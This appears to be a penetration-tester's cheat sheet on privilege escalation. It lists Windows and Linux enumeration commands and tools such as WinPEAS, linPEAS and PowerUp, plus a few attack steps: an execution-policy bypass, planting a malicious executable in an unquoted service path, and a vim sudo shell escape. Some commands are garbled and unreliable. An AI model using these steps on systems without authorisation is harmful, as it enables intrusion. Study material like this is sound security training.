Privilege Escalation [PrevEsc]

Privilege Escalation

Manual Enumeration

Users

Windows:
- Identify the current user:
  whoami net user
Linux:
- Identify the current user and user details:
  whoami id

Hostname

Windows:
- Obtain system and hostname information:
  systeminfo hostname
Linux:
- Obtain system and hostname information:
  uname -a hostname cat /etc/issue

Running Processes and Services

Windows:
- List running processes and associated services:
  tasklist /svc
Linux:
- List all running processes:
  ps aux

Network Information

Windows:
- Obtain network information:
  ipconfig /all route print netstat -ano
Linux:
- Obtain network information:
  ip a | sudo ifconfig ssh -anp

Firewall

Windows:

Check Windows firewall settings:

netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all

Linux:
- Check iptables rules:
  iptables -L

Scheduled Tasks

Windows:
- List scheduled tasks:
  schtasks /query /fo LIST /v
Linux:
- List scheduled tasks:
  ls -lah /etc/cron*

Applications and Patch Levels

Windows:

List installed applications and patches:

wmic product get name, version, vendor
wmic qfe get Caption, Description, HotFixID, InstalledOn

Linux:
- List installed packages:
  dpkg -l

Readable/Writable Files

Windows:
- Check permissions of files and directories:
  accesschk.exe -uws "Everyone" "C:/Program Files"
Linux:
- Find writable directories:
  find / -writable -type d 2>/dev/null

Unmounted Disks

Windows:
- List unmounted disks:
  mountvol
Linux:
- List unmounted disks:
  mount

Drivers and Kernel Modules

Windows:
- List installed drivers:
  driverquery.exe
Linux:
- List loaded kernel modules:
  lsmod modinfo <MODULE_NAME>

Binaries that Auto Elevate

Identify binaries that auto elevate privileges.

Automated Enumeration

Tools

Use various tools for automated privilege escalation enumeration:
- Windows:
  - windows-privesc-checker
  - Watson
  - Sherlock
  - PowerUp
  - Windows-Exploit-Suggester
  - JAWS
  - WinPEAS.exe and .bat
- Linux:
  - linPEAS
  - LinEnum

Windows PrivEsc

Insecure File Permissions

Using PowerShell:

Set execution policy and use PowerUp tool:

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

Check file permissions:
```
icacls.exe "<FILE_PATH>"
```

Unquoted Service Paths

Create a malicious .exe file in one of the unquoted paths.

Linux PrivEsc

Understanding Permissions in Linux

Learn about file and directory permissions in Linux.

sudo -l

Check sudo privileges:
```
sudo -l
```

sudo vim -c ':!/bin/bash'

Escalate privileges using Vim:
```
sudo vim -c ':!/bin/bash'
```

PreviousPassword Attacks NextLinux Privilege Escalation

Last updated 1 year ago

hashtagPrivilege Escalation

hashtagManual Enumeration

hashtagAutomated Enumeration

hashtagWindows PrivEsc

hashtagLinux PrivEsc